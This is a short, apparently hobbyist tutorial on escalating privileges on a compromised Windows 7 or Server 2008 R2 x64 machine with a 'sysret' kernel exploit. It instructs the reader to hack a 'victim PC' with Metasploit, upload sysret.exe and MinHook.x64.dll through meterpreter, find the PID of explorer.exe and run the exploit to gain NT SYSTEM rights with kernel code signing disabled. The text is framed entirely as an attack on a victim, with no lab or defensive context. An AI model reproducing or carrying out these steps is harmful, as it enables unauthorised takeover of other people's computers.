The shellcode disables kernel Code Signing and will grant NT SYSTEM privilege to specified Application or already running process (PID). Exploit successfully tested on Windows 7 SP0/1 (x64) and Windows 2008 R2 SP1 (x64).
First Hack the Victim PC Using Metaspolit (Tutorial How to Hack Remote PC)
Download the sysret from here and unzip file in your desktop
Once you got the meterpreter session use ‘upload ‘command to upload the sysret.exe and MinHook.x64 in victim pc using
Upload /root/desktop/sysret/x64/Release/sysret.exe .
Upload /root/desktop/sysret/x64/Release/MinHook.x64.dll .
Now session use ‘ps‘command to displays a list of running processes on the target and find the PID number of Explorer.exe
The next step is we need to attach Meterpreter to the explorer.exe process. Victim explorer.exe process ID is 1588. Now type sysret.exe =pid (PID Number)